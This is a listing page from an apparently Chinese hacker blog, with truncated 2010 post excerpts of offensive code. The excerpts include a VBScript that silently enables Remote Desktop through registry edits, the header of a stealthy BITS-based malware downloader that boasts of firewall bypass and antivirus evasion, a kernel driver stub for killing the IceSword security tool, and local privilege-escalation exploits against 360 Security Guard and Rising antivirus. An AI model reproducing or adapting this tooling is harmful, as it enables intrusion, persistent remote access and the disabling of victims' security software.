coding - Blog - PortWatcher's Blog | 黑客是一种精神

3389.vbs

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValue ... Read more »

Category: coding | Views: 823 | Added by: Jury | Date: 2010-04-20 | Comments (0)

利用微软更新服务进行下载的下载者代码

Code

/*
  0x48k BITS DOWNLOADER

  FEATURES
  - downloading manual number of files
  - report to stat script, if downloading success (for each file)
  - using BITS (Background Intelligent Transfer Service) for downloading
  - bypass most of firewalls (thanks to BITS =))
  - not using import table, for better av-stealth)
  - small size (above 1.7k with FSG)

  PRIVATE SOURE CODE BY Cr4s ... Read more »

Category: coding | Views: 1448 | Added by: Jury | Date: 2010-04-20 | Comments (36)

最简洁的代码结束冰刃

转自黑客防线论坛黑客编程板块

Code

#include  <windows.h>

typedef NTSTATUS (*PSPTERPROC) ( PEPROCESS Process, NTSTATUS ExitStatus );
PSPTERPROC MyPspTerminateProcess ;
NTSTATUS
PsLookupProcessByProcessId(
  IN HANDLE ProcessId,
  OUT PEPROCESS *Process
  );

void Unload(PDRIVER_OBJECT pDriverObj)
{
  DbgPrint("Driver Stop\n");
}

NTSTATUS D ... Read more »

Category: coding | Views: 719 | Added by: Jury | Date: 2010-04-01 | Comments (0)

360本地提权漏洞

/*
# Software Link: http://sd.360.cn/sd_download1.html?src=360home]
# Version: [6.1.5.1009]
# Tested on: [Windows xp]

Vendor : Qihoo 360
Affected Software : 360 Security Guard 6.1.5.1009

Description:

Qihoo 360 Security Guard is very famous in China.

Some vulnerabilities have been reported in Qihoo 360 Security Guard, which can be exploited by malicious, local users to gain escalated privileges.

An error in the kernel-mode driver (bregdrv.sys) when handling input passed through the user-mode dynamic link library (bregdll.dll) can be exploited to

read/write/modification registry in kernel mode.

An attacker can exploit this issue to read/write/modification registry with kernel-level privileges. Successful exploits will result in the complete

compromise of affected computers.

Details:

The kernel-mode driver (bregdrv.sys) use CmXxx series functions to read/write/modification registry with kernel-level privileges, bregdll.dll wrappers ... Read more »

Category: coding | Views: 621 | Added by: Jury | Date: 2010-02-04 | Comments (0)

网马猥亵技巧

1、前段时间看到的：

Code

2、刚刚不小心看到的：

Code

Category: coding | Views: 743 | Added by: Jury | Date: 2010-01-30 | Comments (0)

瑞星2008,2009,2010本地提权

by Dlrow dlrow1991@ymail.com

restore all ssdt hooks

Code

// Rising0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
enum { SystemModuleInformation = 11 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName& ... Read more »

Category: coding | Views: 672 | Added by: Jury | Date: 2010-01-29 | Comments (3)

« 1 2

分类

站内搜索

日历

友情链接

访问统计(起于2010/10/2)

Blog